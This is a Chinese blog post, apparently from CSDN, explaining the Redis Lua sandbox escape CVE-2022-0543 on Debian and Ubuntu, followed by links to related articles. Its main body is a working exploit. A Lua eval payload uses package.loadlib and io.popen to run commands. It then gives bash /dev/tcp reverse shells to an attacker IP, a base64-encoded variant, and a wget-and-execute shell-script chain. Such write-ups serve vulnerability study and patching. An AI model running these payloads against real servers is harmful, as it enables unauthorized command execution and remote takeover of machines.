Redis Lua沙盒绕过RCE(CVE-2022-0543)

于 2024-08-19 13:42:15 发布
阅读量276 收藏 1
点赞数 7
分类专栏: Redis漏洞 文章标签: redis lua 网络安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57163799/article/details/141323025
版权

原理

Redis Lua沙盒绕过RCE的原理主要涉及到Redis在Lua沙箱中遗留了一个对象package。在Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了这个对象package。攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

具体来说,Redis一直有一个攻击面,就是在用户连接Redis后,可以通过eval命令执行Lua脚本。但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。然而,由于在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

使用条件

  1. 未授权访问或拿到账号密码
  2. 目标为Debian及其衍生版

影响范围 

Debian 系的 Linux 发行版本 + Ubuntu

CVE-2022-0543,该 Redis 沙盒逃逸漏洞影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞,漏洞形成原因在于系统补丁加载了一些redis源码注释了的代码。

借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。

需要注意的一点是 : 不同系统下liblua5.1.so.0的路径可能不同

我们可以利用这个模块,来加载任意Lua库,最终逃逸沙箱,执行任意命令:

// 加载Lua标准库中的io模块,使得后续的代码可以使用io模块提供的函数 
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); 
// 调用io模块的luaopen_io函数,返回一个io对象,该对象可以用于执行系统命令 
local io = io_l(); 
// 使用io.popen函数执行id命令,并返回一个文件对象f,该对象可以用于读取命令的输出。 
local f = io.popen("id", "r"); 
// 使用f:read函数读取id命令的输出,并将结果存储在变量res中。 
local res = f:read("*a"); 
// 关闭文件f 
f:close(); 
// 返回输出结果下 
return res
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

这里的id就是就是需要执行的命令。

代码解释:

eval 命令是 Redis 中的一个脚本执行命令,可以用于执行 Lua 脚本或者 Lua 脚本文件。

eval 命令的语法如下:

eval "代码" numkeys key [key ...] arg [arg ...]

其中,代码 是要执行的 Lua 脚本,numkeys 是键名参数的个数,key [key ...] 是在脚本中所用到的 Redis 键名参数,arg [arg ...] 是附加参数。当 numkeys 为 0 时,表示脚本中不需要使用 Redis 键名参数。

反弹shell

这里的反弹将上面的id命令改为反弹命令即可

1.nc监听

nc -lvp 端口

2.反弹

这里可以使用多种反弹方式以应对不同的环境情况。

1.普通反弹

bash -i >& /dev/tcp/192.168.200.185/1234 0>&1
bash -c "bash -i >& /dev/tcp/192.168.200.185/1234 0>&1"

2.编码反弹

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xODUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}

3.上传shell脚本反弹

编写shell脚本反弹

shell bash -i >& /dev/tcp/192.168.200.185/1234 0>&1

开启http服务

python3 -m http.server [port] 或 python -m SimpleHTTPServer [port]

分三次执行payload,并将id替换为下面的命令:

wget -P /tmp http://192.168.200.185/shell.sh     #将反弹命令写入
/tmp/shell.sh文件 chmod +x /tmp/shell.sh         #赋予可执行权限 
bash /tmp/shell.sh                               #执行该文件

3.反弹成功

不想秃头的烟花
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-0543Redis 沙盒逃逸漏洞)
Battery的博客
11-23 11万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
《深入理解resty-redis-cluster:Openresty Lua中的Redis集群客户端》 在现代Web服务开发中,数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统,广泛应用于缓存、消息队列等领域。而...
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
Adminxe的博客
03-14 4267
0x00 背景 巴西研究员 Reginaldo Silva 于 2022 年 3 月 8 日公开披露 该漏洞,从他的博客得知 CVE-2022-0543Redis 沙盒逃逸漏洞仅影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞 https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce 0x01 条件 未授权访问或拿到账号密码 目标为Debian及其衍生版 0x02 原理 首先,redis一直有一..
Redis Lua沙盒绕过命令执行(CVE-2022-0543
jiji_king的博客
07-07 299
个人笔记
Redis Lua沙箱绕过RCE(CVE-2022-0543)复现
3tefanie丶zhou的博客
03-16 2394
【牛角尖扎人,都不如刀子嘴戳人来得厉害】
CVE-2022-0543redis lua沙盒绕过命令执行漏洞复现
m0_62008601的博客
11-22 1309
redis 是完全开源的,遵守 BSD 协议,是一个高性能的 key-value 数据库。造成redis沙盒逃逸漏洞的原因主要是由于redis luaredis嵌入了lua编程语言作为其脚本引擎,可通过eval命令使用lualua引擎是沙盒化的,不能在运行redis的服务器上执行任意代码。但在Debian以及ubuntu发行版上,由于打包问题,在lua沙箱中遗留了一个对象package,攻击者可以利用这个对象package逃逸redis lua沙盒,在运行redis的服务器上执行任意命令。
CVE-2022-0543Redis Lua沙盒绕过命令执行复现
网安君的博客
03-16 6102
0x00 漏洞简介 Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本1的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 参考链接: https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce https://bugs.debian.org/cgi-bin/
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4549
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令。Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是沙盒化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
没有故事
04-18 825
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。
春秋云境:CVE-2022-0543Redis 沙盒逃逸漏洞)
m0_65712192的博客
08-21 1809
Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
lua-resty-redis-connector:lua-resty-redis的连接实用程序
02-03
`lua-resty-redis-connector` 是一个针对 `lua-resty-redis` 库的扩展模块,主要用于在 OpenResty(一个基于 Nginx 的高性能 Web 平台,集成了 LuaJIT)环境中提供更高效的 Redis 连接管理。这个库帮助开发者在处理...
lua-resty-redis-util:openrestylua-resty-redis封装工具类
02-03
`lua-resty-redis-util` 是一个专门为 OpenResty(一个基于 Nginx 的高性能 Web 平台,集成了 LuaJIT)设计的 Redis 客户端库的封装工具类。这个工具类使得在 OpenResty 中使用 LuaRedis 进行交互变得更加便捷和...
redis-lua-scaling-bloom-filter:用于缩放布隆过滤器的LUA Redis脚本
02-03
redis-lua-scaling-bloom-filter add.lua , cas.lua和check.lua是用于的三个lua脚本layer-add.lua和later-check.lua是用于的两个lua脚本这些脚本将在Redis中使用命令执行。 这些脚本可能无法在Redis集群上运行,...
redis事件机制
最新发布
笑笑布丁的博客
08-16 590
aeApiAddEvent、aeApiDelEvent:增加或删除一个监听对象。aeEventLoop:redis事件循环器,负责管理事件。aeFileEvent:存储一个文件描述符已注册的文件事件。aeApiPoll:阻塞进程,等待事件就绪或给定事件到期。aeApiCreate:初始化I/O复用机制上下文环境。aeTimeEvent:存储一个时间事件的信息。
Redis单线程模式
m0_59680769的博客
08-15 326
单线程的程序是无法利用服务器的多核 CPU 的,所以。,更多情况下是受到内存大小和网络I/O的限制。
Redis 为什么读写性能高?
heromps的博客
08-09 601
Redis 作为一种开源的、基于内存的数据结构存储系统,以其卓越的读写性能而闻名。它被广泛应用于缓存、消息队列、实时数据处理等场景。那么,是什么使得 Redis 拥有如此高的读写性能呢?本文将从以下几个方面进行探讨。
Spring-data-redis
m0_68041576的博客
08-15 584
说明: 在 SpringBoot2.x 之后,原来使用的jedis 被替换为了 lettucejedis : 采用的直连,多个线程操作的话,是不安全的,如果想要避免不安全的,使用 jedis pool 连接池lettuce : 采用netty,实例可以再多个线程中进行共享,不存在线程不安全的情况!可以减少线程数据了@Bean//1.创建自定义模板类//配置json类型的序列化工具//这样key会用字符串方式保存/*** 测试自定义。
redis lua沙盒绕过
08-14
根引用和引用,在Debian和Ubuntu的Redis发行版中,由于在Lua沙箱中遗留了一个对象package,攻击者可以利用该对象的方法加载动态链接库liblua里的函数,从而逃逸沙箱执行任意命令。但要利用这个漏洞,攻击者需要具有执行eval命令的权限,即攻击者经过认证或Redis本身未设置鉴权检查。 另外,根据引用,一些发行版本(如Ubuntu、Debian和CentOS)会在原始软件的基础上打补丁,其中有一个针对Redis的补丁。该补丁在lua_libs_debian.c中增加了一个include语句,并使用make生成补丁包。 综上所述,Redis Lua沙盒绕过漏洞存在于Debian和Ubuntu的Redis发行版中,攻击者可以利用这个漏洞来执行任意命令,前提是攻击者具有执行eval命令的权限,并且Redis未设置鉴权检查。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Redis Lua沙盒绕过命令执行(CVE-2022-0543)](https://blog.csdn.net/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【CVE-2022-0543Redis Lua沙盒绕过命令执行复现](https://blog.csdn.net/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [简单漏洞:CVE-2022-0543 Redis Lua 沙盒绕过](https://blog.csdn.net/qq_74447851/article/details/128791134)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值